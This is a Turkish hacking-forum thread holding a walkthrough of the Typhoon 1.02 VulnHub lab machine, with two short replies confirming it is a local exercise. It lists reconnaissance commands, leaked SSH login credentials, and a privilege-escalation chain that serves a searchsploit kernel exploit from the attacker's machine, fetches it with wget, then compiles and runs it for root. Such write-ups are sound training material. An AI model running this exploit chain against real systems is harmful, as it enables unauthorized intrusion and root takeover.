Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm


Typhoon: 1.02 Zafiyetli Makine Çözümü

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 07-12-2018 14:26   #1
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 407


Typhoon: 1.02 Zafiyetli Makine Çözümü



Typhoon: 1.02 Zafiyetli Makine Çözümü

Typhoon: 1.02 indirme linki;

Kod:
https://www.vulnhub.com/entry/typhoon-102,267/
Makinemizin ilk açılış görüntüsü.





İlk olarak makinemizin IP adresini öğreniyoruz.

Kod:
netdiscover




Ardından nmap taraması ile açık portlara bakıyoruz.

Kod:
nmap -sS -sV <adress>




Sitemize bir bakıyoruz.Bizi bu şekilde bir site karşılıyor.



Ardından dirb taraması yapıp site içerisindeki dosyalara bakıyoruz.

Kod:
dirb http://<adress>




Sitemizde robots.txt adlı bir uzantı var çoğunlukla burada çözümde ilerlemeye dayalı bilgiler barındırılıyor hemen robots.txt'yi açıyoruz.



robots.txt'yi açtığımızda bize başka bir uzantıya gitmemiz gerektiğini söylüyor.



[stats] a bastığımız zaman aşağıya bir takım giriş bilgilerinin geldiğini görmekteyiz.



Bu giriş bilgileri doğrultusunda giriş yapmayı deniyoruz.

Kod:
ssh typhoon@<adress>
Kod:
789456123


Şimdi kendimizi root'a yükseltmemiz gerekiyor.Bunun için ilk olarak ubuntunun exploitlerine bakıyoruz.Ardından 7575 portu üzerinden python kodu ile giriş sağlayacağız.7575 portumuzu dinlemeye alıyoruz.


Kod:
searchsploit ubuntu 14.04
Kod:
searchsploit -m 37292
python -m SimpleHTTPServer 7575


Şimdi dinlemeye aldığımız 7575 portumuza makinemizden 37292.c dosyasını indirmesini sağlıyoruz.Ardından 37292.c dosyasını derlemesini sağlıyoruz.Derledikten sonra da dosyamızı açıyoruz.


Kod:
cd /tmp
Kod:
wget http://<uradress>:7575/37292.c
gcc 37292.c -o exploit
./exploit


Açıktan yararlanarak sistemde root kullanıcısı olduk şimdi tek yapmamız gereken flag.txt'yi aramak olacak.

Kod:
cd /root
Kod:
cat root-flag











___________________________________________

A hacker does for love what others would not do for money.

Konu Qwx tarafından (07-12-2018 14:27 Saat 14:27 ) değiştirilmiştir.. Sebep: flag.jpg'yi ortaladım.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

oxcakmak Teşekkür etti.
Alt 07-12-2018 14:28   #2
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
12/2018
Nereden
Kocaeli
Yaş
19
Mesajlar
Konular

Teşekkür (Etti): 390
Teşekkür (Aldı): 110




Ellerine sağlık bu local hack için mi?



___________________________________________

Backend Developer
 Offline  
 
Alıntı ile Cevapla
Alt 07-12-2018 14:36   #3
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 407




Alıntı:
oxcakmak´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık bu local hack için mi?

Teşekkür ederim.Evet local hack için.



___________________________________________

A hacker does for love what others would not do for money.
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau